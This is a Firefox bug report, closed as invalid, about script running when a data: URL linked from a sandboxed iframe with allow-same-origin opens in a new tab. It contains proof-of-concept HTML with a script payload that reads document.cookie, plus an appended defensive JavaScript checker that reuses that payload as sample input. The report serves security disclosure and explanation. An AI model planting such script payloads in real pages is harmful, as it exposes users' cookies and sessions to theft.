In a sandboxed iframe, a data: URL opened in a new tab can lead to XSS (Firefox should disable javascript execution when a Sandboxed iframe contains a webpage with a data: URL opened in a new tab)

RESOLVED INVALID

Status

Firefox
Untriaged
RESOLVED INVALID
a year ago
a year ago

People

(Reporter: Jordi Chancel, Unassigned)

Tracking

53 Branch

Firefox Tracking Flags

(Not tracked)

Details

(Reporter)

Description

a year ago
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:53.0) Gecko/20100101 Firefox/53.0
Build ID: 20170413192749

Steps to reproduce:


-1) Go to "iframe-sandbox.html"

-2) The webpage in the sandboxed iframe contains a link with a data URL

-3) Open the link in a new tab

iframe-sandbox.html source:

<html>
<body>
<b>XSS in iframe sandbox using <u>"data:" URL</u> opened in a new tab</b><br> 
<iframe frameborder="0" sandbox="allow-same-origin" src="./iframe-src-webpage.html" ></iframe>
</body>
</html>

------
webpage.html source:

<html>
<head>
</head>
<body>
<a href=" data:text/html;html,<script>alert(document.cookie);</script>">Open Me in a new tab</a>
</body>
</html>



Actual results:

JavaScript code can be executed:

The Sandboxed iframe security can be bypassed and lead to XSS if a data URL is opened in a new tab.


Expected results:

Firefox should disable javascript execution when a Sandboxed iframe contains a webpage with a data: URL opened in a new tab.

A data URL is a document that is in the same domain as the containing document (unless you put it in a sandbox WITHOUT the allow-same-origin attribute). If you replace that link with a URL on that domain then the same thing would happen:
 * if you navigate inside the sandbox scripts are prevented
 * if you open the document in a new tab (Ctrl-click) it is no longer sandboxed and scripts run

The behavior of the data: link is as-expected and consistent with how the sandbox works and how data: urls work in Firefox. What this bug comes down to is "data url inheritance is an XSS risk" which is a) known and b) something we're measuring to see if we can change. See bug 255107 and particularly bug 1018872.
Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Last Resolved: a year ago
Resolution: --- → INVALID
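
The two conditions the comment above describes (a sandbox that keeps allow-same-origin, and a framed page that links to a data: document), as an added check that is not part of the bug report or of Firefox. The function names are hypothetical, the two HTML fragments are copied from the report, and pairing one framed page with every iframe is a simplifying assumption.

```javascript
// Added example (hypothetical helper names); sample HTML is from the report.
const PARENT_HTML = '<iframe frameborder="0" sandbox="allow-same-origin" ' +
  'src="./iframe-src-webpage.html" ></iframe>';
const FRAMED_HTML = '<a href=" data:text/html;html,<script>alert(document.cookie);' +
  '</script>">Open Me in a new tab</a>';

// Match a whole start tag even when a quoted attribute value contains ">".
const startTag = (name) =>
  new RegExp(`<${name}\\b((?:[^>"']|"[^"]*"|'[^']*')*)>`, 'gi');
const ATTR = /([\w-]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;

// Attribute map for every start tag of the given name.
function tags(html, name) {
  return [...html.matchAll(startTag(name))].map((tag) => {
    const attrs = {};
    for (const m of tag[1].matchAll(ATTR)) {
      attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? '';
    }
    return attrs;
  });
}

// One entry per sandboxed iframe in the embedding page.
function auditFrames(parentHtml) {
  return tags(parentHtml, 'iframe').filter((a) => 'sandbox' in a).map((a) => {
    const tokens = new Set(a.sandbox.toLowerCase().split(/\s+/).filter(Boolean));
    return {
      src: a.src ?? null,
      scriptsRunInFrame: tokens.has('allow-scripts'),
      keepsEmbedderOrigin: tokens.has('allow-same-origin'),
    };
  });
}

// Links in the framed page whose target is a data: document.
function dataLinks(framedHtml) {
  return tags(framedHtml, 'a').map((a) => (a.href ?? '').trim())
    .filter((href) => /^data:/i.test(href));
}

// Per the comment: with allow-same-origin, a data: document opened from the
// frame in a new tab is no longer sandboxed and is same-domain with the embedder.
function report(parentHtml, framedHtml) {
  const links = dataLinks(framedHtml).length;
  return auditFrames(parentHtml).map((f) => ({
    ...f, dataLinks: links, newTabRunsAsEmbedder: f.keepsEmbedderOrigin && links > 0,
  }));
}
console.log(report(PARENT_HTML, FRAMED_HTML));
```
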